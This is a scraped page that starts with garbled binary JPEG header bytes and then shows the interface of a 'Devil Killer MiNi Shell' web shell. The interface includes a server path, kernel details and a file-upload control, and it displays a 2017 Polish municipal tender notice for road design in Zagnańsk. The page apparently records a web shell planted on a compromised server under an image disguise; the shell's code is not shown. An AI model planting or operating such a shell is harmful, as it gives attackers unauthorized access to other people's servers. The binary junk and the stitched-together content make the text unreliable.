JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20170403/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20170403/57342-N-2017.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://www.biuletyn.net/nt-bin/start.asp?podmiot=zagnansk/&strona=13&typ=podmenu&typmenu=13&menu=15&podmenu=15&str=1' target='_blank'>http://www.biuletyn.net/nt-bin/start.asp?podmiot=zagnansk/&strona=13&typ=podmenu&typmenu=13&menu=15&podmenu=15&str=1</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 57342 - 2017
              z dnia 2017-04-03 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Zagnańsk: Wykonanie projektów budowlanych:  Wykonanie projektu budowlanego Zadania A Przebudowa ul. Słonecznej w Zagnańsku w ramach Programu Rewitalizacji Gminy Zagnańsk. Zadania B - Projekt budowy drogi w msc. Samsonów ul. Rurarni<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Usługi
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                tak
              </div><br /><b>Nazwa projektu lub programu</b><br />Rewitalizacja Gminy Zagnańsk</div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Gmina Zagnańsk, krajowy numer identyfikacyjny
              29101086600000, ul.
              ul. Spacerowa 
              8,
              26050  
              Zagnańsk, woj.
              świętokrzyskie, państwo
              Polska, tel.
              413 001 322, e-mail
              sekretariat@zagnansk.pl, faks
              413 001 373.
              <br />
              Adres strony internetowej (URL): www.zagnansk.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  tak
                <br />http://www.biuletyn.net/nt-bin/start.asp?podmiot=zagnansk/&amp;strona=13&amp;typ=podmenu&amp;typmenu=13&amp;menu=15&amp;podmenu=15&amp;str=1</div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  nie
                <br />http://www.biuletyn.net/nt-bin/start.asp?podmiot=zagnansk/&amp;strona=13&amp;typ=podmenu&amp;typmenu=13&amp;menu=15&amp;podmenu=15&amp;str=1</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />w formie pisemnej pod rygorem nieważności<br />
                Adres:
                <br />Urząd Gminy Zagnańsk, </div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Wykonanie projektów budowlanych:  Wykonanie projektu budowlanego Zadania A Przebudowa ul. Słonecznej w Zagnańsku w ramach Programu Rewitalizacji Gminy Zagnańsk. Zadania B - Projekt budowy drogi w msc. Samsonów ul. Rurarni<br /><b>Numer referencyjny: </b>PZ.271.1.5.2017.PZZ<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                usługi
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  <br /></div><b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b><br />2<br /><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>Zadania A  Projekt budowlany Przebudowa ul. Słonecznej w Zagnańsku
I) Projekt budowlany  
1. Wykonanie map dla celów projektowych z uwzględnieniem źródłowej dokumentacji geodezyjnej (celem weryfikacji granic) w zakresie niezbędnym do opracowania przedmiotowej dokumentacji, w skali 1:500
2. Opracowanie dokumentacji geotechnicznej  4 egz.
3. Wykonanie operatu i uzyskanie pozwolenia wodnoprawnego.
4. Wykonanie koncepcji projektu celem akceptacji przez Zamawiającego.
5. Opracowanie projektu budowlanego i wykonawczego drogi oraz innych projektów koniecznych do przebudowy wszystkich kolidujących sieci i urządzeń infrastruktury technicznej, zgodnie z uzyskanymi przez Wykonawcę warunkami technicznymi od zarządców sieci, z podziałem na poszczególne branże wraz z wszelkimi uzgodnieniami m.in. uzyskanie w imieniu Zamawiającego ostatecznej decyzji o zezwoleniu na realizację inwestycji drogowej i dokonanie stosownych zgłoszeń robót niewymagających pozwolenia na budowę. Wykonawca wystąpi do zarządcy drogi powiatowej Nr 0300T, Powiatowego Zarządu Dróg w Kielcach o wydanie warunków technicznych na projektowanie wraz ze wszystkimi uzgodnieniami oraz do Lasów Państwowych w sprawie wytycznych do projektowania.
6. Zaprojektować asfaltowy pas jezdny drogi (alternatywnie z kostki brukowej) wraz z zawrotką na końcu (działka Nr ewid. 472-zachować maksymalnie istniejący drzewostan).
7. Zaprojektować jednostronny chodnik przyjezdniowy z kostki betonowej koloru czerwonego  (dopuszcza się możliwość rezygnacji z projektowania chodnika w przypadku problemów z jego lokalizacją w granicach własności gminy). 
8. Zaprojektować zjazdy na posesje w granicach pasa drogowego z koski betonowej koloru szarego oraz dojścia do furtek do wszystkich nieruchomości przylegających do projektowanej drogi. Zapewnić na etapie projektowania możliwość dojazdu do działki Nr ewid. 461, zaprojektować zjazd. Lokalizację zjazdów uzgodnić z właścicielami nieruchomości.
9. Doprojektować oświetlenie uliczne w zakresie od istniejącego słupa przy posesji Nr 5, działka. nr ewid 474/6 do końca drogi na działce nr 472(przewidziana do zaprojektowania zawrotka).
10. Założyć przebudowę kolidujących z pasem drogowym słupów energetycznych(m.in. słup podwójny przy działce nr ewid. 474/11.
11. Założyć przebudowę słupa telekomunikacyjnego zlokalizowanego przy działce nr ewid. 474/12.
12. Zaprojektować rów odwadniający, spływ wody w kierunku istniejącego rowu przy drodze powiatowej(założyć czyszczenie rowu przy drodze powiatowej w prawo w kierunku msc Bartków do pierwszego przepustu drogowego), alternatywnie kanalizację deszczową.
13.Zaprojektować przepust pod projektowaną drogą na jej włączeniu do drogi powiatowej.
14.Przewidzieć przebudowę istniejącej sieci wodociągowej wraz z przyłączami, przebudowę  kanalizacji sanitarnej wraz z przyłączami i przełożenie jej z gruntów prywatnych w pas drogowy oraz usunięcia ewentualnej kolizji sieci (przyłączy) gazowych.
15.Przewidzieć zamontowanie na istniejącej studni wody pitnej zlokalizowanej w pasie drogowym zdroju czerpalnego z pompowaniem ręcznym lub jeżeli będzie taka możliwość pozostawić w istniejącej formie.
16.Wykonanie projektu stałej organizacji ruchu (uzgodnionego i zaakceptowanego przez  odpowiednie organy).
17. Sporządzenie informacji dotyczącej bezpieczeństwa i ochrony zdrowia.
18. Opracowanie tabeli zjazdów (załączonej do projektu wykonawczego).
19. Opracowanie Specyfikacji Technicznej Wykonania i Odbioru Robót.
20. Uzyskanie wszystkich wymaganych decyzji, w tym decyzji środowiskowej(jeżeli jest taka konieczność), pozwoleń, opinii, uzgodnień i sprawdzeń dokumentacji projektowych w zakresie wynikającym z przepisów koniecznych do uzyskania decyzji o zezwoleniu na realizację inwestycji drogowej oraz realizacji robót objętych zakresem zamawianych dokumentacji.
21. Wykonanie z podziałem na poszczególne branże przedmiarów robót, kosztorysów ślepych 
i kosztorysów inwestorskich wraz z ZZK (zbiorczym zestawieniem kosztów)
22. w oparciu o projekt budowy drogi i ewentualnej przebudowy urządzeń technicznych, projektant wyznaczy linie rozgraniczające pasa drogowego do podziałów oraz granice terenu niezbędnego do czasowego zajęcia dla obiektów budowlanych w przypadku gdy ich przebudowa odbywać się będzie poza wyznaczonym pasem drogowym, w celu przebudowy lub zabezpieczenia infrastruktury technicznej (innym kolorem) wkreślone w projekcie budowlanym i wykonawczym.
II Projekt podziału nieruchomości
1. sporządzenie projektu podziału nieruchomości - 6 egz.;
2. zgłoszenie w Powiatowym Ośrodku Dokumentacji Geodezyjnej i Kartograficznej Starostwa Powiatowego w Kielcach na koszt własny Wykonawcy;
3. wskazanie Zamawiającemu na gruncie nowo wydzielonych nieruchomości;
4. sporządzenie wykazu zmian gruntowych do przeprowadzenia zmian w księgach wieczystych. Wykonawca dostarczy Zamawiającemu zaklauzulowane materiały geodezyjne:
4.1. mapy jednostkowe podziału dla każdej nieruchomości osobno wraz z wykazem zmian gruntowych - 6 egz.;
4.2 wykaz synchronizacyjny w przypadku, gdy w księdze wieczystej  lub w razie jej braku  w innych dokumentach określających stan prawny nieruchomości, nieruchomość podlegająca podziałowi posiada inne oznaczenie i inną powierzchnię niż w katastrze nieruchomości, odrębnie dla każdej nieruchomości - 2 egz.;
4.3. mapa zbiorcza zawierająca projekt podziału nieruchomości wraz z wykazem zmian gruntowych - 6 egz.;
4.4. skrócony wypis hipoteczny - 1 egz.;
4.5. opis topograficzny punktów granicznych, nawiązanych do stałych elementów terenu, pozwalający na ich jednoznaczne wyznaczenie w terenie - 1egz.;
4.6. zarys pomiarowy  1 egz.;
4.7. wykaz współrzędnych geodezyjnych granic pasa drogowego, osnowy geodezyjnej     i współrzędnych działek w pasie drogowym w formacie .dwg na nośniku CD 
i w formie papierowej  po 1egz.
5. w/w materiały geodezyjne nie wykorzystane do uzyskania decyzji o zezwolenie 
na realizację inwestycji drogowej Wykonawca przekaże Zamawiającemu.
6. wyznaczenie i stabilizacja punktów granicznych:
6.1. wszystkie punkty załamania pasa drogowego będą utrwalone betonowymi punktami  granicznymi z wyłączeniem przypadków, gdy granica zostanie ustalona po trwałym ogrodzeniu  po uprawomocnieniu się decyzji o zezwoleniu na realizację inwestycji drogowej;
6.2. punkty przecięcia linii rozgraniczających z granicami działek będą stabilizowane słupkami drewnianymi oznaczonymi jaskrawą farbą;
Zakładany zakres projektowy drogi oraz warunki do projektowania obejmuje załącznik 
nr 6 do SIWZ



 





Zadanie B  Projekt budowy drogi w msc. Samsonów ul. Rurarnia 
I) Projekt budowlany
1.Wykonanie map dla celów projektowych z uwzględnieniem źródłowej dokumentacji geodezyjnej  celem weryfikacji granic w zakresie niezbędnym do opracowania przedmiotowej dokumentacji w skali 1:500,
2.Opracowanie dokumentacji geotechnicznej  4 egz.
3.Wykonanie operatu i uzyskanie pozwolenia wodnoprawnego na odprowadzenie wód 
z odwodnienia drogi,
4.Uzyskanie  decyzji  o środowiskowych  uwarunkowaniach przedsięwzięcia, 
5.Wykonanie koncepcji projektu wraz z przebudową urządzeń technicznych celem akceptacji przez Zamawiającego.
6.Opracowanie projektu budowlanego i wykonawczego drogi oraz innych projektów koniecznych do przebudowy wszystkich kolidujących sieci i urządzeń infrastruktury technicznej, zgodnie z uzyskanymi przez Wykonawcę warunkami od zarządców sieci, z podziałem na poszczególne  branże wraz ze wszelkimi uzgodnieniami m.in. uzyskanie w imieniu Zamawiającego ostatecznej  decyzji o zezwoleniu na realizację   inwestycji drogowej i dokonanie stosownych zgłoszeń robót  niewymagających pozwolenia na budowę.
7.Długość projektowanej drogi ok. 1130,00 m.;
7.1.Wykonanie projektu odwodnienia z uwzględnieniem  kanalizacji deszczowej, cieku 
przyjezdniowego oraz odbioru wód z odwodnienia drogi wewnętrznej ( dz. nr ewid.2283/9) 
oznaczona symbolem KDW1 w mpzp;     
7.2Umocnienie  rowów odprowadzających wody opadowe z odwodnienia drogi  płytami  chodnikowymi ( spód i boki do wysokości jednej płyty) lub  przyjąć inne  alternatywne 
rozwiązanie;
7.4Rregulacja studzienek kanalizacyjnych (opracowana jest dokumentacja i posiada uzgodniony ZUD- realizacja przed budową inwestycji drogowej;)
7.5.Wykonanie projektu stałej organizacji ruchu;
7.6.Wykonanie projektu chodnika z kostki brukowej koloru czerwonego;
7.7.Wykonanie  projektu zjazdów:
 -  z kostki koloru szarego  na działki i  nieruchomości zabudowane  o szerokości  5 mb,
 -   o nawierzchni  bitumicznej  na drogi oznaczone w mpzp sołectwa  Samsonów  symbolem   KD-Z i KD-L,KDW1,o szerokości 6 mb (zjazd publiczny);
8.Sporządzenie wykazu drzew z podaniem nr  nieruchomości do usunięcia  przypadku 
 zaistniałej takiej  sytuacji;
9. Sporządzenie informacji dotyczącej bezpieczeństwa i ochrony zdrowia;
10. Opracowanie tabeli zjazdów (załączonej do projektu wykonawczego);
11. Przebudowa ogrodzeń będących w kolizji z pasem drogowym;
12. Wykonanie projektu  budowy oświetlenia drogowego;
13. Wykonanie  projektu budowy kanalizacji sanitarnej  - załącznik nr 6 b
14. Opracowanie Specyfikacji Technicznej Wykonania i Odbioru Robót;
15. Uzyskanie wszystkich wymaganych decyzji, pozwoleń, opinii, uzgodnień i sprawdzeń 
dokumentacji projektowych w zakresie wynikającym z przepisów koniecznych do uzyskania 
decyzji o zezwoleniu na realizację inwestycji drogowej oraz realizacji robót objętych 
zakresem zamawianych dokumentacji.
16. Wykonanie z podziałem na poszczególne branże przedmiarów robót, kosztorysów ślepych  i kosztorysów inwestorskich wraz ze ZZK (zbiorczym zestawieniem kosztów)
17Sprawowanie nadzoru autorskiego nad inwestycją wykonywaną na podstawie opracowanych dokumentacji projektowych w zakresie wynikającym z art. 20 ust. 4 ustawy z dnia 7 lipca 1994r.  Prawo budowlane oraz inne czynności określone wymaganiami Zamawiającego.
18.W oparciu o projekt przebudowy drogi i przebudowy urządzeń technicznych, projektant  wyznaczy linie rozgraniczające pasa drogowego do podziałów oraz granice terenu    niezbędnego do czasowego zajęcia dla obiektów budowlanych w przypadku gdy ich przebudowa odbywać się będzie poza wyznaczonym pasem drogowym, w celu przebudowy 
lub zabezpieczenia infrastruktury technicznej (innym kolorem) wkreślone w projekcie  budowlanym i wykonawczym. 
19.Zakres projektowanej drogi obejmuje również włączenie do dróg: wojewódzkiej Nr 750 i  powiatowej nr 0437 T  Kielce  Zagnańsk i nr 0298 T Samsonów  Szałas  Odrowąż .

II Projekt podziału nieruchomości
1. Sporządzenie projektu podziału nieruchomości - 6 egz.;
2.Zgłoszenie w Powiatowym Ośrodku Dokumentacji Geodezyjnej i Kartograficznej Starostwa   Powiatowego w Kielcach na koszt własny Wykonawcy;
3.Wskazanie Zamawiającemu na gruncie nowo wydzielonych nieruchomości z udziałem zarządcy drogi;
4.Sporządzenie wykazu zmian gruntowych do przeprowadzenia zmian w księgach wieczystych. Wykonawca dostarczy Zamawiającemu zaklauzulowane materiały geodezyjne:
4.1.Mapy jednostkowe podziału dla każdej nieruchomości wraz z wykazem zmian gruntowych - 5 egz.;
4.2.Wwykaz synchronizacyjny w przypadku, gdy w księdze wieczystej  lub w razie jej braku  w innych dokumentach określających stan prawny nieruchomości, nieruchomość podlegająca podziałowi posiada inne oznaczenie i inną powierzchnię niż w katastrze nieruchomości, odrębnie dla każdej nieruchomości - 2 egz.;
4.3.Mpę zbiorczą zawierającą projekt podziału nieruchomości wraz z wykazem zmian gruntowych - 6 egz.;
4.4. Skrócony wypis hipoteczny - 1 egz.;
4.5. Opis topograficzny punktów granicznych, nawiązanych do stałych elementów terenu, pozwalający na ich jednoznaczne wyznaczenie w terenie - 1egz.;
4.6. Zarys pomiarowy  1 egz.;
4.7. Wykaz współrzędnych geodezyjnych granic pasa drogowego, osnowy geodezyjnej   
i współrzędnych działek w pasie drogowym w formacie dwg na nośniku CD 
i w formie papierowej  po 1egz.
5.W/w materiały geodezyjne nie wykorzystane do uzyskania decyzji o zezwolenie 
na realizację inwestycji drogowej Wykonawca przekaże Zamawiającemu.
6.Wyznaczenie i stabilizacja punktów granicznych:
6.1. Wszystkie punkty załamania pasa drogowego będą utrwalone betonowymi punktami   
granicznymi z wyłączeniem przypadków, gdy granica zostanie ustalona po trwałym 
ogrodzeniu  po uprawomocnieniu się decyzji o zezwoleniu na realizację inwestycji drogowej;
6.2. Punkty przecięcia linii rozgraniczających z granicami działek będą stabilizowane słupkami  drewnianymi oznaczonymi jaskrawą farbą


Zakładany zakres projektowy drogi oraz warunki do projektowania obejmuje załącznik 
nr 6a do SIWZ


3.3. Podstawy prawne w/w opracowań: 
Dokumentacja projektowo - kosztorysowa musi być opracowana w sposób zgodny z zasadami 
     wiedzy technicznej, sztuki budowlanej, obowiązującymi przepisami bhp, p.poż. 
     i sanitarnohigienicznymi, oraz stanem prawnym obowiązującym na dzień przekazania 
     Zamawiającemu ze szczegółowością wynikającą z:

	ustawy z dnia 7 lipca 1994 r. Prawo budowlane (j.t. Dz. U. z 2016r. poz. 290 ze zm.),
	rozporządzenia Ministra Infrastruktury z dnia 3 lipca 2003r. w sprawie szczegółowego zakresu i form projektu budowlanego (j.t. Dz. U. z 2012r. poz. 462 ze zm.),
	rozporządzenia Ministra Infrastruktury z dnia 2 września 2004r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (j.t. Dz. U. z 2013r. poz. 1129 ze zm.)
	rozporządzenia Ministra Transportu i Gospodarki Morskiej z dnia 2 marca 1999r.
 w sprawie warunków technicznych, jakim powinny odpowiadać drogi publiczne i ich usytuowanie  (j.t. Dz. U. z 2016r. poz. 124  ze zm.) 
	rozporządzenia Ministra Infrastruktury z dnia 18 maja 2004 r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczenia planowanych kosztów robót budowlanych określonych w programie funkcjonalno  użytkowym 
( Dz. U. z 2004r. nr 130 poz. 1389),
	ustawy z dnia 27.04.2001r. Prawo ochrony środowiska (j.t. Dz.U. 2016r. poz. 672 
ze zm.),
	ustawy z dnia 1 lutego 2007r. o odpadach (j.t. Dz. U. z 2016r. poz. 1987 ze zm.),
	innych aktów prawa powszechnie obowiązujących.

3.4 Informacje dotyczące oferty i uzgodnienia projektów z Zamawiającym
1. Przed rozpoczęciem prac, projektant wraz z Zamawiającym przeprowadzi wizję lokalną 
w terenie i uszczegółowi zakres prac projektowych;
2. Koncepcję projektową Wykonawca złoży u Zamawiającego do zaopiniowania. Koncepcja musi zawierać rozwiązania drogowe i przebudowy urządzeń technicznych pozwalające jednoznacznie uzgodnić całość projektu lub jego zmiany w formie docelowej. Obecność projektanta na spotkaniu uzgadniającym koncepcję jest obowiązkowa. 
3. W przypadku uwag, Wykonawca zobowiązany jest nanieść poprawki i ponownie przedłożyć Zamawiającemu. 
4. Zamawiający zajmie stanowisko  w ciągu 7 dni roboczych od daty złożenia koncepcji;
5.Akceptacja końcowa Zamawiającego nastąpi niezwłocznie w formie pisemnej po jej uzgodnieniu z przedstawicielami samorządu lokalnego,
6. Wykonawca ponosi wszystkie koszty związane z realizacja zamówienia, w tym koszty wszelkich uzgodnień 
7. Przed złożeniem wniosku o decyzję o zezwoleniu na realizację inwestycji drogowej, Wykonawca musi uzyskać od Zamawiającego pisemną akceptację projektu budowlanego.(dotyczy zadania A i B) 
8.Dokumentacja projektowo - kosztorysowa powinna określać parametry techniczne 
i funkcjonalne przyjętych rozwiązań materiałowych, wybranej technologii uwzględniając zasady uczciwej konkurencji (w przypadku określenia konkretnych materiałów, jakie projektant proponuje do zastosowania, wskazaniu takiemu muszą towarzyszyć wyrazy lub równoważne).

3.5.Co miesiąc ( zadania A), co kwartał (Zadanie B), Wykonawca przedstawi na piśmie Zamawiającemu szczegółowe sprawozdanie z realizacji poszczególnych pozycji harmonogramu wykonywanych prac przedmiotu zamówienia z poprzedniego miesiąca, wraz z kopiami wystąpień, uzgodnień i innej korespondencji związanej z realizacją dokumentacji projektowych.

3.6. Dokumentacje projektowe należy opracować w oparciu o:
 - warunki techniczne Zamawiającego i zakres do projektowania  - załącznik 6 i 6a oraz zakres  do projektowania kanalizacji ( zadanie B)  załącznik nr   6b
 - konsultacje i uzgodnienia z wyznaczonymi przedstawicielami Zamawiającego,
 - sporządzony przez Wykonawcę harmonogram prac projektowych, który Wykonawca dostarczy Zamawiającemu przed podpisaniem umowy.
<br /><br /><b>II.5) Główny kod CPV: </b>71320000-7<br /><b> Dodatkowe kody CPV:</b>71240000-2<br /><b>
